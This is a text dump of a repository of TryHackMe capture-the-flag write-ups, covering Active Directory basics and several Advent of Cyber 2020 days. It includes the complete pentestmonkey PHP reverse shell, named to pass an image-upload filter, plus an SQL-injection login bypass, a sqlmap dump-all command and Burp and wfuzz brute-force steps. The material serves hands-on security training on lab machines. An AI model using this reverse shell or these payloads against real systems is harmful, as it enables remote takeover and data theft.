Showing preview only (944K chars total). Download the full file or copy to clipboard to get everything.
Repository: edoardottt/tryhackme-ctf
Branch: main
Commit: c5850cb9bf83
Files: 230
Total size: 878.7 KB
Directory structure:
gitextract_yp03w5iw/
├── .github/
│ ├── FUNDING.yml
│ ├── ISSUE_TEMPLATE/
│ │ └── bug_report.md
│ └── auto_assign.yml
├── Active-Directory-Basics/
│ └── README.md
├── Advent-of-Cyber-2020/
│ ├── Day-01-A_Christmas_Crisis/
│ │ └── README.md
│ ├── Day-02-The_Elf_Strikes_Back!/
│ │ ├── README.md
│ │ └── reverse.jpeg.php
│ ├── Day-03-Christmas_Chaos/
│ │ └── README.md
│ ├── Day-04-Santa's_watching/
│ │ ├── README.md
│ │ └── create_list.py
│ ├── Day-05-Someone_stole_Santa's_gift_list!/
│ │ └── README.md
│ ├── Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/
│ │ └── README.md
│ ├── Day-07-The_Grinch_Really_Did_Steal_Christmas/
│ │ ├── %2f
│ │ ├── README.md
│ │ ├── elf_mcskidy_wishlist.txt
│ │ ├── pcap1.pcap
│ │ ├── pcap2.pcap
│ │ └── pcap3.pcap
│ ├── Day-08-What's_Under_the_Christmas_Tree?/
│ │ └── README.md
│ ├── Day-09-Anyone_can_be_Santa!/
│ │ ├── README.md
│ │ ├── backup.sh
│ │ ├── old_backup.sh
│ │ └── shoppinglist.txt
│ ├── Day-10-Dont-be-sElfish/
│ │ ├── README.md
│ │ └── note_from_mcskidy.txt
│ ├── Day-11-The_Rogue_Gnome/
│ │ ├── LinEnum.sh
│ │ └── README.md
│ ├── Day-12-Ready,_set,_elf./
│ │ └── README.md
│ ├── Day-13-Coal_for_Christmas/
│ │ ├── README.md
│ │ └── dirty.c
│ ├── Day-14-Where's Rudolph?/
│ │ └── README.md
│ ├── Day-15-There's a Python in my stocking!/
│ │ └── README.md
│ ├── Day-16-Help! Where is Santa?/
│ │ ├── README.md
│ │ └── api_fuzzer.py
│ ├── Day-17-ReverseELFneering/
│ │ └── README.md
│ ├── Day-18-The_Bits_of_Christmas/
│ │ └── README.md
│ ├── Day-19-The_Naughty_or_Nice_List/
│ │ └── README.md
│ ├── Day-20-PowershELlF_to_the_rescue/
│ │ └── README.md
│ ├── Day-21-Time_for_some_ELForensics/
│ │ └── README.md
│ ├── Day-22-Elf_McEager_becomes_CyberElf/
│ │ └── README.md
│ ├── Day-23-The_Grinch_strikes_again!/
│ │ └── README.md
│ ├── Day-24-The_Trial_Before_Christmas/
│ │ └── README.md
│ └── README.md
├── Advent-of-Cyber-2021/
│ ├── Day-01-Save_The_Gifts/
│ │ └── README.md
│ ├── Day-02-Elf_HR_Problems/
│ │ └── README.md
│ ├── Day-03-Christmas_Blackout/
│ │ └── README.md
│ ├── Day-04-Santas_Running_Behind/
│ │ └── README.md
│ ├── Day-05-Pesky_Elf_Forum/
│ │ └── README.md
│ ├── Day-06-Patch_Management_Is_Hard/
│ │ └── README.md
│ ├── Day-07-Migration_Without_Security/
│ │ └── README.md
│ ├── Day-08-Santas_Bag_of_Toys/
│ │ └── README.md
│ ├── Day-09-Where_Is_All_This_Data_Going/
│ │ ├── AoC3.pcap
│ │ └── README.md
│ ├── Day-10-Offensive_Is_The_Best_Defence/
│ │ └── README.md
│ ├── Day-11-Where_Are_The_Reindeers/
│ │ └── README.md
│ ├── Day-12-Sharing_Without_Caring/
│ │ └── README.md
│ ├── Day-13-They_Lost_The_Plan/
│ │ └── README.md
│ ├── Day-14-Dev(Insecure)Ops/
│ │ └── README.md
│ ├── Day-15-The_Grinchs_day_off/
│ │ └── README.md
│ ├── Day-16-Ransomware_Madness/
│ │ └── README.md
│ ├── Day-17-Elf_Leaks/
│ │ └── README.md
│ ├── Day-18-Playing_With_Containers/
│ │ └── README.md
│ ├── Day-19-Something_Phishy_Is_Going_On/
│ │ └── README.md
│ ├── Day-20-What_s_the_Worst_That_Could_Happen/
│ │ └── README.md
│ ├── Day-21-Needles_In_Computer_Stacks/
│ │ └── README.md
│ ├── Day-22-How_It_Happened/
│ │ └── README.md
│ ├── Day-23-PowershELlF_Magic/
│ │ └── README.md
│ ├── Day-24-Learning_From_The_Grinch/
│ │ └── README.md
│ └── README.md
├── Agent-Sudo/
│ ├── README.md
│ ├── To_agentJ.txt
│ ├── _cutie.png.extracted/
│ │ ├── 365
│ │ ├── 365.zlib
│ │ ├── To_agentR.txt
│ │ └── zip.hash
│ └── message.txt
├── Anonymous/
│ └── README.md
├── Attacking-Kerberos/
│ └── README.md
├── Attacktive-Directory/
│ └── README.md
├── Authenticate/
│ └── README.md
├── Avengers-Blog/
│ └── README.md
├── Baron-Samedit/
│ └── README.md
├── Bash-Scripting/
│ └── README.md
├── Bebop/
│ └── README.md
├── Bolt/
│ └── README.md
├── Bounty-Hacker/
│ ├── README.md
│ ├── locks.txt
│ └── task.txt
├── Brooklyn-Nine-Nine/
│ └── README.md
├── Brute-It/
│ └── README.md
├── Burp-Suite/
│ └── README.md
├── CC:-Radare2/
│ └── README.md
├── CTF-collection-Vol.1/
│ └── README.md
├── Chill-Hack/
│ └── README.md
├── Common-Linux-Privesc/
│ └── README.md
├── Cross-site-Scripting/
│ └── README.md
├── Cyborg/
│ └── README.md
├── Easy-Peasy/
│ ├── README.md
│ ├── easypeasy.txt
│ ├── hash.txt
│ └── secrettext.txt
├── Encryption-Crypto-101/
│ └── README.md
├── Erit-Securus-I/
│ └── README.md
├── Game-Zone/
│ └── README.md
├── GamingServer/
│ └── README.md
├── Geolocating-Images/
│ └── README.md
├── Getting-Started/
│ └── README.md
├── GoldenEye/
│ └── README.md
├── Gotta-Catch'em-All/
│ └── README.md
├── Hacking-with-Powershell/
│ └── README.md
├── Hardening-Basics-Part-1/
│ └── README.md
├── Hardening-Basics-Part-2/
│ └── README.md
├── Hashing-Crypto_101/
│ └── README.md
├── HeartBleed/
│ └── README.md
├── Intro-PoC-Scripting/
│ └── README.md
├── Intro-to-Python/
│ ├── README.md
│ └── decode.py
├── Intro-to-Windows/
│ └── README.md
├── Introduction-to-Django/
│ └── README.md
├── Introduction-to-Flask/
│ └── README.md
├── Introduction-to-OWASP-ZAP/
│ └── README.md
├── Introductory-Networking/
│ └── README.md
├── JavaScript-Basics/
│ ├── README.md
│ └── sort.js
├── John-The-Ripper/
│ └── README.md
├── Jurassic-Park/
│ └── README.md
├── LFI/
│ └── README.md
├── LFI-Basics/
│ └── README.md
├── LICENSE
├── LazyAdmin/
│ ├── README.md
│ ├── hash.txt
│ ├── mysql_bakup_20191129023059-1.5.1.sql
│ └── rshell.php
├── Linux-Challenges/
│ └── README.md
├── Linux-Fundamentals/
│ ├── Linux-Fundamentals-Part-1/
│ │ └── README.md
│ ├── Linux-Fundamentals-Part-2/
│ │ └── README.md
│ └── Linux-Fundamentals-Part-3/
│ └── README.md
├── Linux-Strength-Training/
│ └── README.md
├── Linux:-Local-Enumeration/
│ └── README.md
├── MAL:-REMnux-The_Redux/
│ └── README.md
├── NIS-Linux_Part_I/
│ └── README.md
├── Nessus/
│ └── README.md
├── Network-Services/
│ └── README.md
├── Network-Services-2/
│ └── README.md
├── Networking/
│ └── README.md
├── Ninja-Skills/
│ └── README.md
├── Nmap/
│ └── README.md
├── OWASP-Juice-Shop/
│ ├── README.md
│ └── ftp/
│ ├── acquisitions.md
│ ├── announcement_encrypted.md
│ ├── coupons_2013.md.bak%00..md
│ ├── eastere.gg%00.md
│ ├── encrypt.pyc%00.md
│ ├── incident-support.kdbx
│ ├── legal.md
│ ├── package.json.bak%00.md
│ ├── quarantine/
│ │ ├── juicy_malware_linux_amd_64.url
│ │ ├── juicy_malware_linux_arm_64.url
│ │ ├── juicy_malware_macos_64.url
│ │ └── juicy_malware_windows_64.exe.url
│ └── suspicious_errors.yml%00.md
├── OWASP-Top-10/
│ ├── 47887.py
│ ├── 48973.txt
│ ├── README.md
│ ├── login-logs.txt
│ └── rce.py
├── Overpass/
│ ├── README.md
│ └── downloads/
│ └── src/
│ └── buildscript.sh
├── Overpass2-Hacked/
│ ├── README.md
│ ├── fasttrack.txt
│ └── overpass2.pcapng
├── Persistence/
│ └── README.md
├── Pickle-Rick/
│ ├── README.md
│ └── reverse-shell.sh
├── Post-Exploitation-Basics/
│ └── README.md
├── README.md
├── Regular-expressions/
│ └── README.md
├── Res/
│ └── README.md
├── RootMe/
│ ├── README.md
│ └── reverse-shell.php5
├── SSRF/
│ └── README.md
├── Searchlight-IMINT/
│ └── README.md
├── Skynet/
│ └── README.md
├── Starting-Out-In-Cyber-Sec/
│ └── README.md
├── Startup/
│ ├── README.md
│ ├── notice.txt
│ └── suspicious.pcapng
├── Steel-Mountain/
│ └── README.md
├── Sublist3r/
│ ├── README.md
│ └── sub-output-nbc.txt
├── The-Cod-Caper/
│ └── README.md
├── The-find-command/
│ └── README.md
├── Toolbox-Vim/
│ └── README.md
├── ToolsRus/
│ └── README.md
├── Tor/
│ └── README.md
├── Upload-Vulnerabilities/
│ └── README.md
├── Web-Scanning/
│ └── README.md
├── Wgel-CTF/
│ └── README.md
├── What-the-Shell?/
│ └── README.md
├── Windows-PrivEsc/
│ └── README.md
├── Wireshark-101/
│ └── README.md
├── XXE/
│ └── README.md
├── Year-of-the-Rabbit/
│ └── README.md
├── ZTH:-Obscure-Web-Vulns/
│ └── README.md
├── ZTH:-Web_2/
│ └── README.md
├── Zero-Logon/
│ └── README.md
├── cc-pentesting/
│ └── README.md
├── crack-the-hash/
│ ├── hash1_4.txt
│ ├── hash2_1.txt
│ ├── hash2_2.txt
│ └── hash2_3.txt
├── iOS-Forensics/
│ └── README.md
├── ignite/
│ ├── 47138.py
│ ├── fuel-cms-exploit.py
│ └── revshell.php
├── kenobi/
│ ├── id_rsa
│ └── log.txt
├── lianyu/
│ ├── exiftool_Queens_Gambit-output.txt
│ ├── exiftool_aa-output.txt
│ ├── exiftool_leave-me-alone-output.txt
│ ├── exploit
│ ├── exploit.c
│ ├── exploit.c.save
│ ├── gobuster-output.txt
│ ├── gobuster-output2.txt
│ ├── gobuster-output3.txt
│ ├── nmap-output.txt
│ └── ss/
│ ├── passwd.txt
│ └── shado
└── tomghost/
└── README.md
================================================
FILE CONTENTS
================================================
================================================
FILE: .github/FUNDING.yml
================================================
github: edoardottt
liberapay: edoardottt
patreon: edoardottt
ko_fi: edoardottt
open_collective: edoardottt
custom: "https://www.paypal.me/edoardottt"
================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: Bug report
about: Create a report to help us improve
title: ''
labels: ''
assignees: ''
---
================================================
FILE: .github/auto_assign.yml
================================================
# Set to true to add reviewers to pull requests
addReviewers: true
# A list of reviewers to be added to pull requests (GitHub user name)
reviewers:
- edoardottt
# A list of keywords to be skipped the process that add reviewers if pull requests include it
skipKeywords:
- wip
# A number of reviewers added to the pull request
# Set 0 to add all the reviewers (default: 0)
numberOfReviewers: 0
================================================
FILE: Active-Directory-Basics/README.md
================================================
# Active Directory Basics
- I understand what Active Directory is and why it is used.
no answer needed
- What database does the AD DS contain?
- `NTDS.dit`
- Where is the NTDS.dit stored?
- `%SystemRoot%\NTDS`
- What type of machine can be a domain controller?
- `Windows server`
- What is the term for a hierarchy of domains in a network?
- `tree`
- What is the term for the rules for object creation?
- `Domain schema`
- What is the term for containers for groups, computers, users, printers, and other OUs?
- `Organization units`
- Which type of groups specify user permissions?
- `Security groups`
- Which group contains all workstations and servers joined to the domain?
- `Domain computers`
- Which group can publish certificates to the directory?
- `Cert publisher`
- Which user can make changes to a local machine but not to a domain controller?
- `Local administrators`
- Which group has their passwords replicated to read-only domain controllers?
- `Allowed RODC Password Replication Group`
- What type of trust flows from a trusting domain to a trusted domain?
- `Directional`
- What type of trusts expands to include other trusted domains?
- `Transitive`
- What type of authentication uses tickets?
- `Kerberos`
- What domain service can create, validate, and revoke public key certificates?
- `Certificate Services`
- What is the Azure AD equivalent of LDAP?
- `Rest apis`
- What is the Azure AD equivalent of Domains and Forests?
- `Tenants`
- What is the Windows Server AD equivalent of Guests?
- `Trusts`
- Deploy the machine
no answer needed
- What is the name of the Windows 10 operating system?
- `Get-NetComputer -fulldata | select operatingsystem`
- `*********** ** ********* **********`
- What is the second "Admin" name?
- `Get-NetUser | select cn`
- `******`
- Which group has a capital “V” in the group name?
- `net localgroup`
- `Hyper-V Administrators`
- When was the password last set for the SQLService user?
- `Get-ADUser -identity SQLService -properties *`
- `5/**/2020 *:**:** PM`
- I understand the basics of Active Directory
no answer needed
================================================
FILE: Advent-of-Cyber-2020/Day-01-A_Christmas_Crisis/README.md
================================================
# Day 1 - A Christmas Crisis
- **Deploy your AttackBox (the blue "Start AttackBox" button)** and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open FireFox on the AttackBox and copy/paste the machines IP into the browser search bar.
no answer needed
- Register for an account, and then login.
What is the name of the cookie used for authentication?
- Go into a browser (I suggest you Chrome or Firefox) and fire up browser developers tools (F12). Go into the storage tab and select cookies on the left. `auth`.
- In what format is the value of this cookie encoded?
- `hexadecimal`
- Having decoded the cookie, what format is the data stored in?
- `json`
- Figure out how to bypass the authentication.
What is the value of Santa's cookie?
- Decode your cookie value from hexadecimal to Text. I used [this](https://cryptii.com/pipes/hex-decoder). Then change your username to `santa`. You should have something like: `************************************************************************************************d65223a2253616e7461227d`
- Now, if you change the previous cookie with this new one and refresh the page you will see some changes...
- Now that you are the santa user, you can re-activate the assembly line!
What is the flag you're given when the line is fully active?
- `THM{********************************}`
## see you...
================================================
FILE: Advent-of-Cyber-2020/Day-02-The_Elf_Strikes_Back!/README.md
================================================
# Day 2 - The Elf Strikes Back!
- What string of text needs added to the URL to get access to the upload page?
- `?id=YOUR-ID-HERE`
- What type of file is accepted by the site?
- Open the browser and check the page source code. You will find this string: `<input type=file id="chooseFile" accept=".jpeg,.jpg,.png">`
- `image`
- Bypass the filter and upload a reverse shell.
In which directory are the uploaded files stored?
- Change the ip in the file reverse.jpeg.php with your ip (in the vpn...so tun0) and upload that file.
- `/uploads/`
- Activate your reverse shell and catch it in a netcat listener!
- `nc -lvnp 1234`
- Go to `http://<TARGET_IP>/uploads/` and click on reverse.jpeg.php
- You should see a shell.
- What is the flag in /var/www/flag.txt?
- `cat /var/www/flag.txt`
- `THM{**********************************}`
## see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-02-The_Elf_Strikes_Back!/reverse.jpeg.php
================================================
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
================================================
FILE: Advent-of-Cyber-2020/Day-03-Christmas_Chaos/README.md
================================================
# Day 3 - Christmas Chaos
- Deploy your AttackBox (the blue "Start AttackBox" button) and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open FireFox on the AttackBox and copy/paste the machines IP (<TARGET_IP>) into the browser search bar.
no answer needed
You should see something this login page:
- Use BurpSuite to bruteforce the login form. Use the following lists for the default credentials:
| Username | Password |
|---|---|
| root | root |
| admin | password |
| user | 12345 |
Use the correct credentials to log in to the Santa Sleigh Tracker app. Don't forget to turn off Foxyproxy once BurpSuite has finished the attack.
- First of all make sure you're under proxy. If not, follow the instructions above (on the CTF page) to enable it if you're using AttackBox. If not, add FoxyProxy to the extensions, then create a record with options: name: `Burp` or whatever you like; Proxy type: `HTTP`; Proxy IP: `127.0.0.1`; Port: `8080`. Then save and enable it.
- Open BurpSuite and perform a login (with random user and pass) request with the Browser.
- On the proxy tab of BurpSuite you should see a new request captured. Something like this:
```POST /login HTTP/1.1
Host: <TARGET_IP>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: http://<TARGET_IP>
Connection: close
Referer: http://<TARGET_IP>/
Upgrade-Insecure-Requests: 1
username=<USERNAME>&password=<PASSWORD>
```
- Right click on it and click `send to Intruder`.
- Go to Intruder tab and then on position sub-tab.
- Change the attack type from `Sniper` to `Cluster Bomb`.
- Make sure the <USERNAME> and the <PASSWORD> are selected with these symbols `username=§<USERNAME>§&password=§<PASSWORD>§`. If not, highlight them with the cursor and click on `Add §`.
- Then switch to Payloads sub-tab and set all the payloads. We have two payloads: username and password, respectively 1 and 2. So, for instance, to set the list of possible payloads for the username, the option `Payload set` will be set to `1` and the we add to the list of payloads our three (just an example, in real we can perform thousands of requests) items. Same for password.
- Start the attack.
- You can see one of the result rows has different length in respect to the others... Let's try with that login credentials!
- Turn off proxy with FoxyProxy
- It works!
- `THM{********************************}`
## see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-04-Santa's_watching/README.md
================================================
# Day 4 - Santa's watching
Our malicious, despicable, vile, cruel, contemptuous, evil hacker has defaced Elf's forums and completely removed the login page! However, we may still have access to the API. The sysadmin also told us that the API creates logs using dates with a format of **YYYYMMDD**.
Recommended list: [big.txt](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/big.txt)
- Deploy your AttackBox (the blue "Start AttackBox" button) and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open FireFox on the AttackBox and copy/paste the machines IP (10.10.135.56) into the browser search bar.
no answer needed
If you navigate with your browser to the <TARGET_IP> you should see this page:
- Given the URL "http://shibes.xyz/api.php", what would the entire wfuzz command look like to query the "breed" parameter using the wordlist "big.txt" (assume that "big.txt" is in your current directory)
**Note: For legal reasons, do not actually run this command as the site in question has not consented to being fuzzed!**
- `wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ`
- Use GoBuster (against the target you deployed -- not the shibes.xyz domain) to find the API directory. What file is there?
- `gobuster dir -u <TARGET_IP> -w big.txt`
- You will find a directory and the a php file.
- Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?
- Execute the python file with `python3 create_list.py`. It will create a list for you with format `YYYYMMDD`.
- `wfuzz -c -z file,YYYYMMDD-list.txt -d "date=FUZZ" --hw 0 http://<TARGET_IP>/api/site-log.php`
- Executing this command, it will try to fuzz the date parameter, and I've inserted the --hw parameter set to 0 because I tried few times and I saw the incorrect answers contains no words.
- The only respone you get is from one word. Just append that word, let's say is YYYYMMDD. Go to browser and query `http://<TARGET_IP>/api/site-log.php?date=YYYYMMDD`.
- `THM{********}`
# see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-04-Santa's_watching/create_list.py
================================================
#!/usr/bin/python3
'''
@author edoardottt
'''
starting_year = 2010
current_year = 2020
def pad_number(inp, length):
if len(str(inp))==length: return str(inp)
return (length - len(str(inp))) * "0" + str(inp)
with open("YYYYMMDD-list.txt","w+") as f:
for y in range(starting_year,current_year + 1):
for m in range(1, 13):
for d in range(1,32):
f.write(pad_number(y,4) + pad_number(m,2) + pad_number(d,2) + "\n")
================================================
FILE: Advent-of-Cyber-2020/Day-05-Someone_stole_Santa's_gift_list!/README.md
================================================
# Day 5 - Someone stole Santa's gift list!
- Without using directory brute forcing, what's Santa's secret login panel?
- You don't have to use a directory fuzzer because you will not find a list with this word.
- `santapanel`
You will see this page:
- Visit Santa's secret login panel and bypass the login using SQLi
no answer needed
- Just enter in the username field `' OR true --`
- How many entries are there in the gift database?
- `(' OR true --`
- `22`
- What did Paul ask for?
- `github ownership`
- What is the flag?
- You have to enable the Burp option with FoxyProxy.
- Then, open BurpSuie and perform a single request with the text field.
- You will see BurpSuite opened with a http request. Send to repeater and save the item as shown in the explaining part previous the ctf.
- Then start sqlmap with `sqlmap -r request.txt --tamper=space2comment --dump-all --dbms sqlite` taking request.txt as the saved file with BurpSuite.
- (If sqlmap will ask you something, you have to try the largest attack you can, so try to perform all the tries you can; choosing y or n when it asks you).
- `thmfox{***_*_****_***_*********_**_***}`
- What is the admin password?
- `****************`
# see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-06-Be_careful_with_what_you_wish_on_a_Christmas_night/README.md
================================================
# Day 6 - Be careful with what you wish on a Christmas night
- Deploy your AttackBox (the blue "Start AttackBox" button) and the tasks machine (green button on this task) if you haven't already. Once both have deployed, open Firefox on the AttackBox and copy/paste the machines IP (http://<TARGET_IP>:5000) into the browser search bar (the webserver is running on port 5000, so make sure this is included in your web requests).
no answer needed
- What vulnerability type was used to exploit the application?
- `stored crosssite scripting`
- What query string can be abused to craft a reflected XSS?
- If you query one example on the first search bar, you will see there's a new char appended to URL.
- `q`
- Launch the OWASP ZAP Application
no answer needed
- Run a ZAP (zaproxy) automated scan on the target. How many alerts does it display?
- `5`
- How many types of XSS are there in the scan?
- `2`
- Explore the XSS alerts that ZAP has identified, are you able to make an alert appear on the "Make a wish" website?
no answer needed
## see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/%2f
================================================
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>TBFC's Internal Blog</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link
rel="alternate"
type="application/rss+xml"
href="http://tbfc.blog/index.xml"
title="TBFC's Internal Blog"
/>
<link rel="stylesheet" href="http://tbfc.blog/fontawesome/css/all.min.css" />
<link
id="dark-mode-theme"
rel="stylesheet"
href="http://tbfc.blog/css/dark.css"
/>
<script>
var darkTheme = document.getElementById('dark-mode-theme')
var storedTheme = localStorage.getItem('dark-mode-storage')
if (storedTheme === 'dark') {
darkTheme.disabled = false
} else if (storedTheme === 'light') {
darkTheme.disabled = true
}
</script>
<script src="http://tbfc.blog/js/bundle.js"></script>
<script src="http://tbfc.blog/js/instantpage.min.js" type="module" defer></script>
<meta name="generator" content="Hugo 0.78.2" />
</head>
<body>
<header>
<nav class="navbar">
<div class="nav">
<a href="http://tbfc.blog/" class="nav-logo">
<img
src="http://tbfc.blog/images/icon.png"
width="50"
height="50"
alt="Logo"
/>
</a>
<ul class="nav-links">
<li>
<a href="/tags" id="Tags"
><em class="fas fa-tag fa-lg"></em
></a>
</li>
<li>
<a href="/categories" id="Category"
><em class="fas fa-folder-open fa-lg"></em
></a>
</li>
<li>
<a href="/search" id="Search"
><em class="fas fa-search fa-lg"></em
></a>
</li>
</ul>
</div>
</nav>
<div class="intro-header">
<div class="container">
<div class="page-heading">
<h1>
TBFC's Internal Blog
</h1>
</div>
</div>
</div>
</header>
<div class="container" role="main">
<div class="posts-list">
<article class="post-preview">
<a href="http://tbfc.blog/posts/reindeer-of-the-week/">
<h2 class="post-title">Reindeer of the Week</h2>
</a>
<div class="post-entry">
</div>
<div class="postmeta">
<span class="meta-post">
<em class="fa fa-calendar-alt"></em
> Nov 25, 2020
</span>
</div>
</article>
<article class="post-preview">
<a href="http://tbfc.blog/posts/meet-the-team/">
<h2 class="post-title">Meet the Team</h2>
</a>
<div class="post-entry">
</div>
<div class="postmeta">
<span class="meta-post">
<em class="fa fa-calendar-alt"></em
> Nov 25, 2020
</span>
</div>
</article>
<article class="post-preview">
<a href="http://tbfc.blog/posts/recruitment-drive/">
<h2 class="post-title">Recruitment Drive</h2>
</a>
<div class="post-entry">
<p>Hey fellow Elves! We’re currently recruiting for the positions listed below. As always, please sned your reccomendations to your workshop manager - any successful referer will receieve a $150 bonus in their next pay packet.
1x HR Manager: We are seeking a new Elf McKaren. All applications must have 3 years prior experience in a similar role and be able to work under crunch time.
4x Stocking Fillers Our dispatch team is looking for new fresh-faces to bolster the ranks of fellow stocking fillers.</p>
<a href="http://tbfc.blog/posts/recruitment-drive/" class="post-read-more"
>Read More</a
>
</div>
<div class="postmeta">
<span class="meta-post">
<em class="fa fa-calendar-alt"></em
> Nov 25, 2020
</span>
</div>
</article>
</div>
</div>
<footer>
<div class="container">
<p class="credits copyright">
<a href="http://tbfc.blog/about">Elf McEager</a>
©
2020
/
<a href="http://tbfc.blog/">TBFC's Internal Blog</a>
–
<em class="fas fa-moon" id="dark-mode-toggle"></em>
</p>
<p class="credits theme-by">
Powered By <a href="https://gohugo.io">Hugo</a>
Theme
<a href="https://github.com/matsuyoshi30/harbor">Harbor</a>
</p>
</div>
</footer>
</body>
</html>
================================================
FILE: Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/README.md
================================================
# The Grinch Really Did Steal Christmas
Download the ZIP file "aocpcaps.zip" that is attached to this task, use a combination of the filters and features of Wireshark we've covered to answer the questions below:
- Open "pcap1.pcap" in Wireshark. What is the IP address that initiates an ICMP/ping?
- `10.11.3.2`
- If we only wanted to see HTTP GET requests in our "pcap1.pcap" file, what filter would we use?
- `http.request.method == get`
- Now apply this filter to "pcap1.pcap" in Wireshark, what is the name of the article that the IP address "10.10.67.199" visited?
- `reindeer-of-the-week`
- Let's begin analysing "pcap2.pcap". Look at the captured FTP traffic; what password was leaked during the login process?
There's a lot of irrelevant data here - Using a filter here would be useful!
- `*********_********_******`
- Continuing with our analysis of "pcap2.pcap", what is the name of the protocol that is encrypted?
- `ssh`
- Analyse "pcap3.pcap" and recover Christmas!
What is on Elf McSkidy's wishlist that will be used to replace Elf McEager?
- `Rubber ducky`
## see you ...
================================================
FILE: Advent-of-Cyber-2020/Day-07-The_Grinch_Really_Did_Steal_Christmas/elf_mcskidy_wishlist.txt
================================================
Wish list for Elf McSkidy
-------------------------
Budget: £100
x3 Hak 5 Pineapples
x1 Rubber ducky (to replace Elf McEager)
================================================
